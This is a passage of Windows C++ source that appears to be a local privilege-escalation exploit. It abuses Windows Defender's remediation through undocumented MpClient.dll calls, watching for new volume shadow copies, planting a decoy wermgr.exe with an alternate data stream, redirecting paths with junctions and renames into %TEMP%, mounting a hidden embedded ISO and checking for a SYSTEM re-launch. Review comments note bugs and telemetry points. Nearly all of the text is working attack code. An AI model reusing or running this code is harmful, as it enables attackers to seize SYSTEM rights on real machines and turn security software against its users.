RtlInitUnicodeString(&udevpath, devicepath);
OBJECT_ATTRIBUTES objattr = { 0 };
InitializeObjectAttributes(&objattr, &udevpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
NTSTATUS stat = STATUS_SUCCESS;
HANDLE hobjdir = NULL;
DWORD retval = ERROR_SUCCESS;
// Result path; the matching device name is appended below.
wchar_t newvsspath[MAX_PATH] = { 0 };
wcscpy(newvsspath, L"\\Device\\");
bool criterr = false;
int vscnum = 0;
bool restartscan = false;
ULONG scanctx = 0;
ULONG reqsz = sizeof(OBJECT_DIRECTORY_INFORMATION) + (UNICODE_STRING_MAX_BYTES * 2);
ULONG retsz = 0;
OBJECT_DIRECTORY_INFORMATION* objdirinfo = NULL;
bool srchfound = false;
wchar_t vsswinpath[MAX_PATH] = { 0 };
UNICODE_STRING _vsswinpath = { 0 };
OBJECT_ATTRIBUTES objattr2 = { 0 };
IO_STATUS_BLOCK iostat = { 0 };
HANDLE hlk = NULL;
LLShadowVolumeNames* vsinitial = NULL;
// 0x0001 is DIRECTORY_QUERY.
stat = _NtOpenDirectoryObject(&hobjdir, 0x0001, &objattr);
if (stat) {
printf("[!] Failed to open object manager directory, error: 0x%0.8X\n", stat);
retval = RtlNtStatusToDosError(stat);
return retval;
}
// All-zero template entry used to detect the end of each directory listing.
void* emptybuff = malloc(sizeof(OBJECT_DIRECTORY_INFORMATION));
if (!emptybuff) {
printf("[!] Failed to allocate memory.\n");
retval = ERROR_NOT_ENOUGH_MEMORY;
goto cleanup;
}
ZeroMemory(emptybuff, sizeof(OBJECT_DIRECTORY_INFORMATION));
// Baseline: shadow copies that already exist are ignored by the search below.
vsinitial = RetrieveCurrentVSSList(hobjdir, &criterr, &vscnum, &retval);
if (criterr) {
printf("[!] Unexpected error while listing current volume shadow copy volumes.\n");
goto cleanup;
}
if (!vsinitial) {
printf("[*] No volume shadow copies were found.\n");
} else {
printf("[*] Found %d volume shadow copies.\n", vscnum);
}
stat = STATUS_SUCCESS;
// Polling loop: re-enumerates \Device with no delay until a shadow-copy name not in the baseline
// shows up (the goto at the bottom jumps back here).
scanagain:
do {
if (objdirinfo)
free(objdirinfo);
objdirinfo = (OBJECT_DIRECTORY_INFORMATION*)malloc(reqsz);
if (!objdirinfo) {
printf("[!] Failed to allocate required buffer to query object manager directory.\n");
retval = ERROR_NOT_ENOUGH_MEMORY;
goto cleanup;
}
ZeroMemory(objdirinfo, reqsz);
// Unlike RetrieveCurrentVSSList the context is reset on every pass, so a regrown buffer re-reads
// the directory from the start.
scanctx = 0;
stat = _NtQueryDirectoryObject(hobjdir, objdirinfo, reqsz, FALSE, restartscan, &scanctx, &retsz);
if (stat == STATUS_SUCCESS)
break;
else if (stat != STATUS_MORE_ENTRIES) {
printf("[!] NtQueryDirectoryObject failed with 0x%0.8X\n", stat);
retval = RtlNtStatusToDosError(stat);
// objdirinfo is leaked on this path (cleanup does not free it).
goto cleanup;
}
reqsz += sizeof(OBJECT_DIRECTORY_INFORMATION) + 0x100;
} while (1);
// Same entry walk and prefix match as RetrieveCurrentVSSList; see the comments there.
for (ULONG i = 0; i < ULONG_MAX; i++) {
if (memcmp(&objdirinfo[i], emptybuff, sizeof(OBJECT_DIRECTORY_INFORMATION)) == 0) {
break;
}
if (_wcsicmp(L"Device", objdirinfo[i].TypeName.Buffer) == 0) {
wchar_t cmpstr[] = { L"HarddiskVolumeShadowCopy" };
if (objdirinfo[i].Name.Length >= sizeof(cmpstr)) {
if (memcmp(cmpstr, objdirinfo[i].Name.Buffer, sizeof(cmpstr) - sizeof(wchar_t)) == 0) {
// Linear search of the baseline list; a name already present is skipped.
LLShadowVolumeNames* current = vsinitial;
bool found = false;
while (current) {
if (_wcsicmp(current->name, objdirinfo[i].Name.Buffer) == 0) {
found = true;
break;
}
current = current->next;
}
if (found)
continue;
else {
srchfound = true;
// Unbounded append into a MAX_PATH buffer; device names of this form are short, so it fits in practice.
wcscat(newvsspath, objdirinfo[i].Name.Buffer);
break;
}
}
}
}
}
if (!srchfound) {
restartscan = true;
goto scanagain;
}
if (objdirinfo) {
free(objdirinfo);
objdirinfo = NULL;
}
NtClose(hobjdir);
hobjdir = NULL;
printf("[+] New volume shadow copy detected: %ws\n", newvsspath);
wcscpy(vsswinpath, newvsspath);
wcscat(vsswinpath, L"\\Windows");
RtlInitUnicodeString(&_vsswinpath, vsswinpath);
InitializeObjectAttributes(&objattr2, &_vsswinpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
// Second tight spin: retries the open until the device answers anything other than
// STATUS_NO_SUCH_DEVICE — again with no delay and no bound. NULL stands in for 0 for the ULONG
// parameters (attributes, share access, create options, EA length); only attributes are read.
retry:
stat = NtCreateFile(&hlk, FILE_READ_ATTRIBUTES, &objattr2, &iostat, NULL, NULL, NULL, FILE_OPEN, NULL, NULL, NULL);
if (stat == STATUS_NO_SUCH_DEVICE)
goto retry;
if (stat) {
printf("[!] Failed to open volume shadow copy, error: 0x%0.8X\n", stat);
retval = RtlNtStatusToDosError(stat);
goto cleanup;
}
printf("[+] Successfully accessed volume shadow copy.\n");
// CloseHandle on a handle from NtCreateFile works (both end in NtClose) but mixes API layers with
// the NtClose used for hobjdir above.
CloseHandle(hlk);
if (fullvsspath)
wcscpy((wchar_t*)fullvsspath, newvsspath);
cleanup:
if (hobjdir)
NtClose(hobjdir);
if (emptybuff)
free(emptybuff);
if (vsinitial)
DestroyVSSNamesList(vsinitial);
return retval;
}
// Callback handed to MpCleanStart through the two-entry table WDStartScan builds. It only announces
// that it was invoked and reports success (0).
// NOTE(review): the parameters Defender actually passes are not known from this listing; the
// no-argument prototype is the author's guess and merely ignores whatever is supplied.
DWORD MpCleanCallbackFunction() {
    std::fputs("[*] MpCleanCallbackFunction called.\n", stdout);
    return 0;
}
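// Reads the Defender install directory from
// HKLM\SOFTWARE\Microsoft\Windows Defender\InstallLocation into dirname.
//   dirname  buffer of at least MAX_PATH wchar_t (that size is what the registry query is given)
// Returns true on success; on failure prints the Win32 error and returns false.
// The value type is not validated (keytype is only an in/out hint), and REG_SZ data stored in the
// registry is not guaranteed to be NUL-terminated, so the last slot is forced to NUL before returning.
bool GetWDInstallDir(wchar_t* dirname) {
    HKEY hkey = NULL;
    LSTATUS lstat = RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows Defender", NULL, KEY_QUERY_VALUE, &hkey);
    if (lstat) {
        printf("[!] Failed to open Windows Defender registry key, error: %d\n", lstat);
        return false;
    }
    DWORD keytype = REG_SZ;
    DWORD datasz = MAX_PATH * sizeof(wchar_t);
    lstat = RegQueryValueEx(hkey, L"InstallLocation", NULL, &keytype, (LPBYTE)dirname, &datasz);
    // Close on every path; the original leaked the key handle when the value query failed.
    RegCloseKey(hkey);
    if (lstat) {
        printf("[!] Failed to query Windows Defender install location, error: %d\n", lstat);
        return false;
    }
    // Guarantee termination even if the stored value filled the whole buffer without a NUL.
    dirname[MAX_PATH - 1] = L'\0';
    return true;
}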
// Writes "<Windows directory>\System32" into dirname (caller supplies at least MAX_PATH wchar_t).
// Despite the name this is simply the System32 directory. Always returns true; the result of
// GetWindowsDirectory is not checked, and the copy into dirname is unbounded.
bool GetWERDir(wchar_t* dirname) {
    wchar_t winroot[MAX_PATH] = { 0 };
    GetWindowsDirectory(winroot, MAX_PATH);
    std::wstring system32(winroot);
    system32 += L"\\System32";
    wcscpy(dirname, system32.c_str());
    return true;
}
// Thread entry point (the argument is ignored). Drives Windows Defender through MpClient.dll's
// exported RPC wrappers: open the manager, scan the single path held in the global zippath, fetch
// the result, open and enumerate the detected threats, then start remediation ("clean").
// Every failure path calls ExitProcess, which tears down the whole process from this worker thread.
// Returns ERROR_SUCCESS.
// The MpClient.dll API is undocumented: all prototypes below are hand-declared, and the flag values
// (e.g. 0x60004000) are not explained anywhere on the page. Nothing here suppresses Defender's own
// logging, so the detection and remediation of zippath would presumably show up in Defender's
// operational log like any other detection.
DWORD WINAPI WDStartScan(void*) {
wchar_t dllpath[MAX_PATH] = { 0 };
if (!GetWDInstallDir(dllpath)) {
ExitProcess(1);
}
// Assumes InstallLocation already ends with a path separator (none is inserted); unbounded append.
wcscat(dllpath, L"MpClient.dll");
HMODULE hm = LoadLibrary(dllpath);
if (!hm) {
printf("[!] Failed to load MpClient.dll, error: %d\n", GetLastError());
ExitProcess(1);
}
// _MpUpdateStart is resolved but never called, and it is missing from the NULL check below.
HRESULT(WINAPI* _MpUpdateStart)(MPHANDLE, DWORD, PMPCALLBACK_INFO, PMPHANDLE) =
(HRESULT(WINAPI*)(MPHANDLE, DWORD, PMPCALLBACK_INFO, PMPHANDLE))
GetProcAddress(hm, "MpUpdateStart");
HRESULT(WINAPI* _MpManagerOpen)(DWORD, PMPHANDLE) =
(HRESULT(WINAPI*)(DWORD, PMPHANDLE))
GetProcAddress(hm, "MpManagerOpen");
HRESULT(WINAPI* _MpScanStart)(MPHANDLE, MPSCAN_TYPE, DWORD, PMPSCAN_RESOURCES, PMPCALLBACK_INFO, PMPHANDLE) =
(HRESULT(WINAPI*)(MPHANDLE, MPSCAN_TYPE, DWORD, PMPSCAN_RESOURCES, PMPCALLBACK_INFO, PMPHANDLE))
GetProcAddress(hm, "MpScanStart");
HRESULT(WINAPI* _MpScanResult)(MPHANDLE, void*) =
(HRESULT(WINAPI*)(MPHANDLE, void*))
GetProcAddress(hm, "MpScanResult");
HRESULT(WINAPI* _MpThreatOpen)(MPHANDLE, MPTHREAT_SOURCE, MPTHREAT_TYPE, PMPHANDLE) =
(HRESULT(WINAPI*)(MPHANDLE, MPTHREAT_SOURCE, MPTHREAT_TYPE, PMPHANDLE))
GetProcAddress(hm, "MpThreatOpen");
HRESULT(WINAPI* _MpThreatEnumerate)(MPHANDLE, PMPTHREAT_INFO*) =
(HRESULT(WINAPI*)(MPHANDLE, PMPTHREAT_INFO*))
GetProcAddress(hm, "MpThreatEnumerate");
HRESULT(WINAPI* _MpCleanOpen)(void*, void*, void***) =
(HRESULT(WINAPI*)(void*, void*, void***))
GetProcAddress(hm, "MpCleanOpen");
HRESULT(WINAPI* _MpCleanStart)(void*, unsigned int, void*) =
(HRESULT(WINAPI*)(void*, unsigned int, void*))
GetProcAddress(hm, "MpCleanStart");
HRESULT(WINAPI* _MpHandleClose)(MPHANDLE) =
(HRESULT(WINAPI*)(MPHANDLE))
GetProcAddress(hm, "MpHandleClose");
if (!_MpManagerOpen || !_MpScanStart || !_MpScanResult || !_MpThreatOpen ||
!_MpThreatEnumerate || !_MpCleanOpen || !_MpCleanStart || !_MpHandleClose) {
printf("[!] Failed to initialize DLL imports.\n");
ExitProcess(1);
}
MPHANDLE hbinding = NULL;
HRESULT hres = _MpManagerOpen(NULL, &hbinding);
if (hres) {
printf("[!] Failed to open Windows Defender RPC interface, error: 0x%0.8X\n", hres);
ExitProcess(1);
}
// Single "file" resource: the path in the global zippath (set outside this excerpt).
MPRESOURCE_INFO scaninfo = { 0 };
scaninfo.Scheme = (wchar_t*)L"file";
scaninfo.Path = zippath;
MPSCAN_RESOURCES scanrsrc = { 0 };
scanrsrc.dwResourceCount = 1;
scanrsrc.pResourceList = &scaninfo;
MPHANDLE scanctx = NULL;
// 0x60004000: undocumented scan flags; their meaning is not given on the page.
hres = _MpScanStart(hbinding, MPSCAN_TYPE_RESOURCE, 0x60004000, &scanrsrc, NULL, &scanctx);
if (hres) {
printf("[!] Failed to start Windows Defender scan, error: 0x%0.8X\n", hres);
ExitProcess(1);
}
// The size of MpScanResult's output is assumed to be 0x90 bytes; sz is unused and scanres is never freed.
DWORD sz = 0x90;
void* scanres = malloc(0x90);
ZeroMemory(scanres, 0x90);
hres = _MpScanResult(scanctx, scanres);
if (hres) {
printf("[!] Failed to fetch scan results, error: 0x%0.8X\n", hres);
ExitProcess(1);
}
MPHANDLE threatctx = NULL;
hres = _MpThreatOpen(scanctx, MPTHREAT_SOURCE_SCAN, MPTHREAT_TYPE_KNOWNBAD, &threatctx);
if (hres) {
printf("[!] Failed to open threats, error: 0x%0.8X\n", hres);
ExitProcess(1);
}
MPTHREAT_INFO* tinfo = NULL;
hres = _MpThreatEnumerate(threatctx, &tinfo);
// 0x1 is S_FALSE; it is taken to mean the enumeration is empty (presumably MpThreatEnumerate's
// end-of-list code — not documented here).
if (hres == 0x1) {
printf("[*] No threats found.\n");
ExitProcess(0);
}
if (hres) {
printf("[!] Failed to enumerate threats, error: 0x%0.8X\n", hres);
ExitProcess(1);
}
// The only field read from the hand-declared MPTHREAT_INFO layout; what 0x1 denotes is not stated.
if (tinfo->ThreatStatus != 0x1) {
printf("[!] Unexpected reply from MpThreatEnumerate.\n");
ExitProcess(1);
}
void** ret = NULL;
hres = _MpCleanOpen(scanctx, NULL, &ret);
if (hres) {
printf("[!] MpCleanOpen failed, error: 0x%0.8X\n", hres);
ExitProcess(1);
}
// Two copies of the same no-argument callback; the real table layout and callback signature are
// not known from the listing.
void* callbackaddr[2] = { (void*)MpCleanCallbackFunction, (void*)MpCleanCallbackFunction };
hres = _MpCleanStart(ret, NULL, callbackaddr);
if (hres) {
printf("[!] MpCleanStart failed, error: 0x%0.8X\n", hres);
ExitProcess(1);
}
// The clean handle (ret) is not closed and the module handle hm is never released.
_MpHandleClose(scanctx);
_MpHandleClose(threatctx);
_MpHandleClose(hbinding);
return ERROR_SUCCESS;
}
// Cache of the bytes WriteEicar reads from "<isomnt>\wermgr.exe" on its first successful call;
// later calls reuse them. Never freed for the lifetime of the process.
char* eicar_data = NULL;
DWORD eicar_sz = 0;
// Creates "<workdir>\wermgr.exe" and fills it with the contents of "<isomnt>\wermgr.exe" (the
// "EICAR" naming is the author's; the bytes come from the mounted image, not from the EICAR test
// string), then adds an alternate data stream ":WDFOO" holding 0x1000 bytes. The first successful
// call caches the source bytes in the globals eicar_data/eicar_sz; later calls write the cached
// copy and skip the ADS. Returns the open destination handle
// (GENERIC_READ|GENERIC_WRITE|DELETE, FILE_SHARE_READ only) or NULL on failure.
//   workdir  directory for the destination file, as an NT-style path usable by NtCreateFile
//   isomnt   directory holding the source file (presumably the mounted ISO — confirm with the caller)
// NOTE(review): every ReadFile/WriteFile result is compared against ERROR_IO_PENDING, but those
// calls return a BOOL (0 on failure, nonzero on success), so none of the checks can ever fire and
// I/O errors go unnoticed. OVERLAPPED is used because the NtCreateFile handles carry no
// FILE_SYNCHRONOUS_IO_* create option (presumably asynchronous — confirm).
HANDLE WriteEicar(wchar_t* workdir, wchar_t* isomnt) {
wchar_t eicarpath[MAX_PATH] = { 0 };
wsprintf(eicarpath, L"%s\\wermgr.exe", workdir);
HANDLE hfile = NULL;
UNICODE_STRING _eicarpath = { 0 };
RtlInitUnicodeString(&_eicarpath, eicarpath);
OBJECT_ATTRIBUTES eicarpathobjattr = { 0 };
InitializeObjectAttributes(&eicarpathobjattr, &_eicarpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
IO_STATUS_BLOCK iostat = { 0 };
NTSTATUS stat = NtCreateFile(&hfile, GENERIC_READ | GENERIC_WRITE | DELETE | SYNCHRONIZE,
&eicarpathobjattr, &iostat, NULL, FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ, FILE_OVERWRITE_IF, NULL, NULL, NULL);
if (stat) {
printf("[!] Failed to create EICAR test file: %ws, error: 0x%0.8X\n", eicarpath, stat);
return NULL;
}
// Fast path on repeat calls: write the cached bytes and return. The write is neither waited for
// nor is its event closed, so the handle is returned with the write possibly still in flight.
if (eicar_data && eicar_sz) {
DWORD writtenbytes = 0;
OVERLAPPED ovp = { 0 };
ovp.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
if (WriteFile(hfile, eicar_data, eicar_sz, &writtenbytes, &ovp) == ERROR_IO_PENDING) {
printf("[!] Failed to write EICAR data, error: %d\n", GetLastError());
return NULL;
}
return hfile;
}
HANDLE hsrc = NULL;
wchar_t eicarsrcpath[MAX_PATH] = { 0 };
wsprintf(eicarsrcpath, L"%s\\wermgr.exe", isomnt);
UNICODE_STRING _eicarsrcpath = { 0 };
RtlInitUnicodeString(&_eicarsrcpath, eicarsrcpath);
OBJECT_ATTRIBUTES eicarsrcpathobjattr = { 0 };
InitializeObjectAttributes(&eicarsrcpathobjattr, &_eicarsrcpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
iostat = { 0 };
stat = NtCreateFile(&hsrc, GENERIC_READ, &eicarsrcpathobjattr, &iostat, NULL, FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN, NULL, NULL, NULL);
if (stat) {
// The message names the destination path, not the source that failed to open; hfile is not closed.
printf("[!] Failed to open EICAR test file: %ws, error: 0x%0.8X\n", eicarpath, stat);
return NULL;
}
LARGE_INTEGER li = { 0 };
GetFileSizeEx(hsrc, &li);
// QuadPart is narrowed to DWORD here and in the length arguments below; malloc is not NULL-checked.
eicar_sz = li.QuadPart;
eicar_data = (char*)malloc(li.QuadPart);
DWORD retbytes = 0;
OVERLAPPED ovp2 = { 0 };
ovp2.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
if (ReadFile(hsrc, eicar_data, li.QuadPart, &retbytes, &ovp2) == ERROR_IO_PENDING) {
printf("[!] Failed to read EICAR data, error: %d\n", GetLastError());
return NULL;
}
WaitForSingleObject(ovp2.hEvent, INFINITE);
CloseHandle(ovp2.hEvent);
DWORD writtenbytes = 0;
OVERLAPPED ovp = { 0 };
ovp.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
if (WriteFile(hfile, eicar_data, li.QuadPart, &writtenbytes, &ovp) == ERROR_IO_PENDING) {
printf("[!] Failed to write EICAR data, error: %d\n", GetLastError());
return NULL;
}
WaitForSingleObject(ovp.hEvent, INFINITE);
// ovp and its event are reused for the ADS write below.
ResetEvent(ovp.hEvent);
// 0x1000 bytes of *uninitialised* heap memory: whatever the process heap happened to contain is
// what ends up in the stream.
void* eicar2 = malloc(0x1000);
UNICODE_STRING adsname = { 0 };
RtlInitUnicodeString(&adsname, L":WDFOO");
OBJECT_ATTRIBUTES objattr2 = { 0 };
// Relative open: the stream name is resolved against hfile as RootDirectory.
InitializeObjectAttributes(&objattr2, &adsname, OBJ_CASE_INSENSITIVE, hfile, NULL);
HANDLE hstream = NULL;
stat = NtCreateFile(&hstream, GENERIC_WRITE | SYNCHRONIZE, &objattr2, &iostat, NULL, FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_CREATE, NULL, NULL, NULL);
if (stat) {
// hsrc, hfile, eicar2 and ovp.hEvent are all leaked on this path.
printf("[!] Failed to create EICAR stream file: %ws%ws, error: 0x%0.8X\n", eicarpath, adsname.Buffer, stat);
return NULL;
}
if (WriteFile(hstream, eicar2, 0x1000, &writtenbytes, &ovp) == ERROR_IO_PENDING) {
printf("[!] Failed to write ADS data, error: %d\n", GetLastError());
return NULL;
}
// NOTE(review): the buffer is freed and the stream handle closed *before* the wait on ovp.hEvent,
// i.e. while the overlapped write may still be in flight — a use-after-free / cancelled-I/O
// hazard in the order written.
free(eicar2);
CloseHandle(hstream);
WaitForSingleObject(ovp.hEvent, INFINITE);
CloseHandle(ovp.hEvent);
CloseHandle(hsrc);
return hfile;
}
// Renames the file or directory behind hobj in place via
// NtSetInformationFile(FileRenameInformationEx).
//   hobj        handle opened with DELETE access (rename requires it)
//   targetpath  new NT-form name; when NULL the target is
//               "\??\%TEMP%\RP_<fresh GUID>" (the default is built in NT
//               "\??\" form, so a caller-supplied path presumably needs the
//               same prefix — the callers in main() all use the default)
// Returns true on STATUS_SUCCESS, false on any other status except
// STATUS_SHARING_VIOLATION, which is retried.
// NOTE(review): the retry loop has no sleep or attempt limit, so while another
// handle blocks the rename this thread spins at full CPU.
// NOTE(review): the malloc()'d FILE_RENAME_INFORMATION is never freed.
// From a monitoring standpoint the rename is an ordinary file-system rename of an
// object into %TEMP%\RP_<GUID>, visible to minifilter / rename auditing.
bool MoveToTempDir(HANDLE hobj, wchar_t* targetpath = NULL) {
GUID uid = { 0 };
RPC_WSTR wuid = { 0 };
UuidCreate(&uid);
UuidToStringW(&uid, &wuid);
// RPC_WSTR is an unsigned short*; treat it as a wide C string. (Never
// released with RpcStringFreeW — minor leak.)
wchar_t* wuid2 = (wchar_t*)wuid;
wchar_t target[MAX_PATH] = { 0 };
if (targetpath) {
wcscpy(target, targetpath);
} else {
ExpandEnvironmentStrings(L"\\??\\%TEMP%\\RP_", target, MAX_PATH);
wcscat(target, wuid2);
}
IO_STATUS_BLOCK iostat = { 0 };
// sizeof(target) is MAX_PATH * sizeof(wchar_t); the whole fixed buffer is
// allocated and passed even though only FileNameLength bytes are meaningful.
PFILE_RENAME_INFORMATION fri = (PFILE_RENAME_INFORMATION)malloc(sizeof(FILE_RENAME_INFORMATION) + sizeof(target));
ZeroMemory(fri, sizeof(FILE_RENAME_INFORMATION) + sizeof(target));
memmove(&fri->FileName[0], target, wcslen(target) * sizeof(wchar_t));
fri->FileNameLength = wcslen(target) * sizeof(wchar_t);
// 0x1 | 0x40: the replace-if-exists and ignore-read-only-attribute bits of the
// *Ex rename information class (FILE_RENAME_FLAG_REPLACE_IF_EXISTS,
// FILE_RENAME_FLAG_IGNORE_READONLY_ATTRIBUTE) — confirm against ntifs.h.
fri->Flags = 0x00000001 | 0x00000040;
do {
// custom_defs::FileRenameInformationEx is declared earlier in the file.
NTSTATUS stat = _NtSetInformationFile(hobj, &iostat, fri, sizeof(FILE_RENAME_INFORMATION) + sizeof(target),
(FILE_INFORMATION_CLASS)custom_defs::FileRenameInformationEx);
if (stat == STATUS_SUCCESS)
return true;
if (stat == STATUS_SHARING_VIOLATION)
continue;
if (stat) {
printf("[!] Failed to move directory, error: 0x%0.8X\n", stat);
return false;
}
} while (1);
// Unreachable: every path inside the loop returns or continues.
return true;
}
// Turns the directory behind hdir into a mount point (junction) whose
// substitute name is `target` and whose print name is empty, by issuing
// FSCTL_SET_REPARSE_POINT with an IO_REPARSE_TAG_MOUNT_POINT buffer.
//   hdir    directory handle (must allow the FSCTL; callers open it with
//           write access)
//   target  NT-form path the junction resolves to (copied into a MAX_PATH buffer,
//           no length check)
// Returns false if the event cannot be created or GetLastError() is not
// ERROR_SUCCESS after the call; true otherwise.
// NOTE(review): the BOOL result of DeviceIoControl itself is discarded, and
// HeapFree() runs between DeviceIoControl and the GetLastError() checks, so the
// value inspected may not be the FSCTL's — success/failure reporting is unreliable.
// NOTE(review): ov.hEvent is never closed (handle leak per call).
// Defender note: setting a mount-point reparse tag on a freshly created directory
// under %TEMP% is the kind of event that file-system minifilter / reparse-point
// telemetry can flag; this function is called three times from main().
bool CreateJunction(HANDLE hdir, wchar_t* target) {
wchar_t rptarget[MAX_PATH] = { 0 };
wchar_t printname[1] = { L'\0' };
wcscpy(rptarget, target);
// Byte sizes of the two names (wide chars, no terminator).
size_t targetsz = wcslen(rptarget) * 2;
size_t printnamesz = 1 * 2;
// +12 appears to cover the four USHORT offset/length fields of the
// MountPointReparseBuffer plus NUL terminators — verify against ntifs.h layout.
size_t pathbuffersz = targetsz + printnamesz + 12;
size_t totalsz = pathbuffersz + REPARSE_DATA_BUFFER_HEADER_LENGTH;
// HEAP_GENERATE_EXCEPTIONS: allocation failure raises an SEH exception instead
// of returning NULL, so rdb is not NULL-checked.
REPARSE_DATA_BUFFER* rdb = (REPARSE_DATA_BUFFER*)HeapAlloc(GetProcessHeap(), HEAP_GENERATE_EXCEPTIONS | HEAP_ZERO_MEMORY, totalsz);
rdb->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
rdb->ReparseDataLength = static_cast<USHORT>(pathbuffersz);
rdb->Reserved = 0;
rdb->MountPointReparseBuffer.SubstituteNameOffset = 0;
rdb->MountPointReparseBuffer.SubstituteNameLength = static_cast<USHORT>(targetsz);
// Substitute name followed by its NUL, then the (empty) print name.
memcpy(rdb->MountPointReparseBuffer.PathBuffer, rptarget, targetsz + 2);
rdb->MountPointReparseBuffer.PrintNameOffset = static_cast<USHORT>(targetsz + 2);
rdb->MountPointReparseBuffer.PrintNameLength = static_cast<USHORT>(printnamesz);
memcpy(rdb->MountPointReparseBuffer.PathBuffer + targetsz / 2 + 1, printname, printnamesz);
OVERLAPPED ov = { 0 };
ov.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
if (!ov.hEvent) {
return false;
}
// Overlapped issue; completion (if pending) is awaited below.
DeviceIoControl(hdir, FSCTL_SET_REPARSE_POINT, rdb, totalsz, NULL, 0, NULL, &ov);
HeapFree(GetProcessHeap(), NULL, rdb);
rdb = NULL;
if (GetLastError() == ERROR_IO_PENDING) {
DWORD retsz = 0;
GetOverlappedResult(hdir, &ov, &retsz, TRUE);
}
if (GetLastError() != ERROR_SUCCESS) {
printf("[!] Failed to create reparse point, error: %d\n", GetLastError());
return false;
}
return true;
}
// Writes the file-scope `rawData` bytes to "%TEMP%\RP_<GUID>", opens that file
// as an ISO through the virtdisk API and attaches it read-only with no drive
// letter. On success the virtual-disk handle is stored in *hiso (if non-NULL)
// and true is returned; the caller later detaches it with DetachVirtualDisk.
// NOTE(review): OpenVirtualDisk and AttachVirtualDisk return the Win32 error code
// directly in `retval`, but both failure messages print GetLastError() instead,
// so the logged number may be unrelated to the actual failure.
// NOTE(review): on the WriteFile failure path `hf` is not closed, and the
// backing file is never deleted on any path.
// Defender note: because ATTACH_VIRTUAL_DISK_FLAG_NO_DRIVE_LETTER is used, the
// mounted volume does not show up as a drive letter; it is only visible at the
// virtual-disk / volume layer — presumably via vhdmp / volume-arrival events, verify.
bool MountISO(HANDLE* hiso) {
GUID uid = { 0 };
RPC_WSTR wuid = { 0 };
UuidCreate(&uid);
UuidToStringW(&uid, &wuid);
wchar_t* wuid2 = (wchar_t*)wuid;
wchar_t target[MAX_PATH] = { 0 };
// Win32 (not NT "\??\") path form here, since CreateFile/OpenVirtualDisk take it.
ExpandEnvironmentStrings(L"%TEMP%\\RP_", target, MAX_PATH);
wcscat(target, wuid2);
HANDLE hf = CreateFile(target, GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (!hf || hf == INVALID_HANDLE_VALUE) {
printf("[!] Failed to create ISO file, error: %d\n", GetLastError());
return false;
}
DWORD dwbytes = 0;
// The "ISO" content is whatever rawData holds (declared at file scope).
if (!WriteFile(hf, rawData, sizeof(rawData), &dwbytes, NULL)) {
printf("[!] Failed to write data to .iso file, error: %d\n", GetLastError());
return false;
}
CloseHandle(hf);
// Microsoft vendor GUID for VIRTUAL_STORAGE_TYPE (same value as the SDK constant).
static const GUID VIRTUAL_STORAGE_TYPE_VENDOR_MS = {
0xEC984AEC, 0xA0F9, 0x47e9, 0x90, 0x1F, 0x71, 0x41, 0x5A, 0x66, 0x34, 0x5B
};
VIRTUAL_STORAGE_TYPE vst = { VIRTUAL_STORAGE_TYPE_DEVICE_ISO, VIRTUAL_STORAGE_TYPE_VENDOR_MS };
HANDLE hvirtdisk = NULL;
DWORD retval = OpenVirtualDisk(&vst, target,
VIRTUAL_DISK_ACCESS_GET_INFO | VIRTUAL_DISK_ACCESS_ATTACH_RO | VIRTUAL_DISK_ACCESS_DETACH,
OPEN_VIRTUAL_DISK_FLAG_NONE, NULL, &hvirtdisk);
if (retval) {
printf("[!] Failed to open virtual disk, error: %d\n", GetLastError());
return false;
}
retval = AttachVirtualDisk(hvirtdisk, NULL,
ATTACH_VIRTUAL_DISK_FLAG_READ_ONLY | ATTACH_VIRTUAL_DISK_FLAG_NO_DRIVE_LETTER,
NULL, NULL, NULL);
if (retval) {
printf("[!] Failed to attach virtual disk, error: %d\n", GetLastError());
return false;
}
if (hiso)
*hiso = hvirtdisk;
return true;
}
// Enables (bEnablePrivilege != FALSE) or disables a single named privilege on
// hToken via AdjustTokenPrivileges.
//   hToken           token opened with at least TOKEN_ADJUST_PRIVILEGES
//   lpszPrivilege    privilege name, e.g. SE_DEBUG_NAME
//   bEnablePrivilege TRUE to set SE_PRIVILEGE_ENABLED, FALSE to clear it
// Returns FALSE (after printing a diagnostic) if the name cannot be looked up,
// the adjustment call fails, or the token does not hold the privilege
// (ERROR_NOT_ALL_ASSIGNED); TRUE otherwise.
BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege) {
    LUID luid = { 0 };
    if (!LookupPrivilegeValue(NULL, lpszPrivilege, &luid)) {
        printf("[!] LookupPrivilegeValue error: %u\n", GetLastError());
        return FALSE;
    }

    TOKEN_PRIVILEGES tp = { 0 };
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Luid = luid;
    tp.Privileges[0].Attributes = bEnablePrivilege ? SE_PRIVILEGE_ENABLED : 0;

    const BOOL adjusted = AdjustTokenPrivileges(hToken, FALSE, &tp, 0, NULL, NULL);
    if (!adjusted) {
        printf("[!] AdjustTokenPrivileges error: %u\n", GetLastError());
        return FALSE;
    }
    // AdjustTokenPrivileges can succeed yet set ERROR_NOT_ALL_ASSIGNED when the
    // token simply lacks the privilege; treat that as failure too.
    if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) {
        printf("[!] The token does not have the specified privilege.\n");
        return FALSE;
    }
    return TRUE;
}
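// Reports whether the current process token's user SID is the well-known
// LocalSystem SID. Used by main() to decide between the "first run" path and
// the "re-launched by the scheduled task" path.
// Returns false if the token cannot be opened or queried, or the buffer cannot
// be allocated; otherwise the result of IsWellKnownSid(..., WinLocalSystemSid).
// Fix: the TOKEN_USER buffer is now freed on every path and the malloc() result
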